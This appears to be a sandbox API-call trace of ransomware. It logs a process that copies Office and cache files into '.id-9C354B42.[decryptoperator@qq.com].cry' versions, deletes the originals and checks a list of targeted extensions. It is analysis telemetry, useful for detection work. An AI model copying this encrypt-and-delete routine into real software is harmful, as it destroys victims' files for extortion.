[0055.742] lstrlenW (lpString=".1cd") returned 4 [0055.742] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0055.742] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\msoshext.dll") returned 68 [0055.742] lstrlenW (lpString=".jpg") returned 4 [0055.742] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0055.742] lstrcmpiW (lpString1=".DLL", lpString2=".cry") returned 1 [0055.742] lstrlenW (lpString="MSOXEV.DLL") returned 10 [0055.743] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0056.025] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=56144) returned 1 [0056.025] CloseHandle (hObject=0x1bc) returned 1 [0056.026] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll")) returned 0x20 [0056.026] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0056.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0056.026] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.026] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXEV.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxev.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0056.026] GetLastError () returned 0x0 [0056.026] ReadFile (hFile=0x1bc, lpBuffer=0x3950020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0) Thread: id = 14 os_tid = 0x9f8 [0035.257] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x3860260 [0035.257] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10000) returned 0x3870268 [0035.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650510 [0035.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x6) returned 0x653230 [0035.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650528 [0035.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x100000) returned 0x3a60020 [0035.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650540 [0035.258] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650540, Size=0x20) returned 0x67fd60 [0035.258] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x10) returned 0x650540 [0035.258] RtlReAllocateHeap (Heap=0x600000, Flags=0x0, Ptr=0x650540, Size=0x20) returned 0x67fd88 [0035.258] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0035.259] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0035.259] Wow64DisableWow64FsRedirection (in: OldValue=0x2edff58 | out: OldValue=0x2edff58*=0x0) returned 1 [0035.259] lstrlenW (lpString="kernel32.dll") returned 12 [0035.259] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd60 | out: hHeap=0x600000) returned 1 [0035.259] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0035.259] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x67fd88 | out: hHeap=0x600000) returned 1 [0035.259] Sleep (dwMilliseconds=0x64) [0035.450] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.450] lstrlenW (lpString="PowerPointMUI.xml") returned 17 [0035.454] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.454] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1450) returned 1 [0035.454] CloseHandle (hObject=0x170) returned 1 [0035.454] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 0x2020 [0035.454] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.454] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.454] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.454] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.454] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0035.455] GetLastError () returned 0x0 [0035.455] ReadFile (in: hFile=0x170, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x5aa, lpOverlapped=0x0) returned 1 [0035.486] WriteFile (in: hFile=0x174, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0035.487] ReadFile (in: hFile=0x170, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0035.487] WriteFile (in: hFile=0x174, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xf6, lpOverlapped=0x0) returned 1 [0035.487] SetEndOfFile (hFile=0x174) returned 1 [0035.487] CloseHandle (hObject=0x174) returned 1 [0035.488] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.488] SetEndOfFile (hFile=0x170) returned 1 [0035.489] CloseHandle (hObject=0x170) returned 1 [0035.489] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.489] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 1 [0035.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.489] lstrlenW (lpString=".doc") returned 4 [0035.489] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.489] lstrlenW (lpString=".docx") returned 5 [0035.489] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.489] lstrlenW (lpString=".pdf") returned 4 [0035.489] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.489] lstrlenW (lpString=".xls") returned 4 [0035.489] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString=".xlsx") returned 5 [0035.490] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.490] lstrlenW (lpString=".ppt") returned 4 [0035.490] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.490] lstrlenW (lpString=".zip") returned 4 [0035.490] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.490] lstrlenW (lpString=".rar") returned 4 [0035.490] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString=".bz2") returned 4 [0035.490] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString=".7z") returned 3 [0035.490] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.490] lstrlenW (lpString=".dbf") returned 4 [0035.490] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.490] lstrlenW (lpString=".1cd") returned 4 [0035.490] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.490] lstrlenW (lpString=".jpg") returned 4 [0035.490] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.490] lstrlenW (lpString=".doc") returned 4 [0035.490] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString=".docx") returned 5 [0035.490] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.490] lstrlenW (lpString=".pdf") returned 4 [0035.490] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString=".xls") returned 4 [0035.490] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString=".xlsx") returned 5 [0035.490] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.490] lstrlenW (lpString=".ppt") returned 4 [0035.490] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.490] lstrlenW (lpString=".zip") returned 4 [0035.490] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.491] lstrlenW (lpString=".rar") returned 4 [0035.491] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.491] lstrlenW (lpString=".bz2") returned 4 [0035.491] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.491] lstrlenW (lpString=".7z") returned 3 [0035.491] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.491] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.491] lstrlenW (lpString=".dbf") returned 4 [0035.491] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.491] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.491] lstrlenW (lpString=".1cd") returned 4 [0035.491] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.491] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0035.491] lstrlenW (lpString=".jpg") returned 4 [0035.491] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.491] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.491] lstrlenW (lpString="PublisherMUI.xml") returned 16 [0035.491] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.492] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1450) returned 1 [0035.492] CloseHandle (hObject=0x170) returned 1 [0035.493] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 0x2020 [0035.493] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.493] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.493] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.493] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.493] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0035.493] GetLastError () returned 0x0 [0035.493] ReadFile (in: hFile=0x170, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x5aa, lpOverlapped=0x0) returned 1 [0035.537] WriteFile (in: hFile=0x174, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0035.537] ReadFile (in: hFile=0x170, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0035.537] WriteFile (in: hFile=0x174, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xf4, lpOverlapped=0x0) returned 1 [0035.538] SetEndOfFile (hFile=0x174) returned 1 [0035.538] CloseHandle (hObject=0x174) returned 1 [0035.538] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.538] SetEndOfFile (hFile=0x170) returned 1 [0035.539] CloseHandle (hObject=0x170) returned 1 [0035.539] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0035.539] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 1 [0035.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.539] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.539] lstrlenW (lpString=".doc") returned 4 [0035.540] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.540] lstrlenW (lpString=".docx") returned 5 [0035.540] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.540] lstrlenW (lpString=".pdf") returned 4 [0035.540] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.540] lstrlenW (lpString=".xls") returned 4 [0035.540] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.540] lstrlenW (lpString=".xlsx") returned 5 [0035.540] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.540] lstrlenW (lpString=".ppt") returned 4 [0035.540] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.540] lstrlenW (lpString=".zip") returned 4 [0035.540] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.540] lstrlenW (lpString=".rar") returned 4 [0035.540] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.540] lstrlenW (lpString=".bz2") returned 4 [0035.540] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.540] lstrlenW (lpString=".7z") returned 3 [0035.540] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.540] lstrlenW (lpString=".dbf") returned 4 [0035.540] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.540] lstrlenW (lpString=".1cd") returned 4 [0035.540] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.540] lstrlenW (lpString=".jpg") returned 4 [0035.540] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.540] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.540] lstrlenW (lpString=".doc") returned 4 [0035.540] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.540] lstrlenW (lpString=".docx") returned 5 [0035.540] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.540] lstrlenW (lpString=".pdf") returned 4 [0035.540] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.541] lstrlenW (lpString=".xls") returned 4 [0035.541] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.541] lstrlenW (lpString=".xlsx") returned 5 [0035.541] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.541] lstrlenW (lpString=".ppt") returned 4 [0035.541] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.541] lstrlenW (lpString=".zip") returned 4 [0035.541] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.541] lstrlenW (lpString=".rar") returned 4 [0035.541] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.541] lstrlenW (lpString=".bz2") returned 4 [0035.541] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.541] lstrlenW (lpString=".7z") returned 3 [0035.541] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.541] lstrlenW (lpString=".dbf") returned 4 [0035.541] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.541] lstrlenW (lpString=".1cd") returned 4 [0035.541] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.541] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 79 [0035.541] lstrlenW (lpString=".jpg") returned 4 [0035.541] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.541] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0035.541] lstrlenW (lpString="Setup.xml") returned 9 [0035.541] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.541] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1608) returned 1 [0035.542] CloseHandle (hObject=0x170) returned 1 [0035.542] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.542] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.542] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.542] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.542] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.542] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0035.542] GetLastError () returned 0x0 [0035.542] ReadFile (in: hFile=0x170, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x648, lpOverlapped=0x0) returned 1 [0035.575] WriteFile (in: hFile=0x174, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x650, lpOverlapped=0x0) returned 1 [0035.576] ReadFile (in: hFile=0x170, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0035.576] WriteFile (in: hFile=0x174, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.576] SetEndOfFile (hFile=0x174) returned 1 [0035.576] CloseHandle (hObject=0x174) returned 1 [0035.577] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0035.577] SetEndOfFile (hFile=0x170) returned 1 [0035.578] CloseHandle (hObject=0x170) returned 1 [0035.578] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", 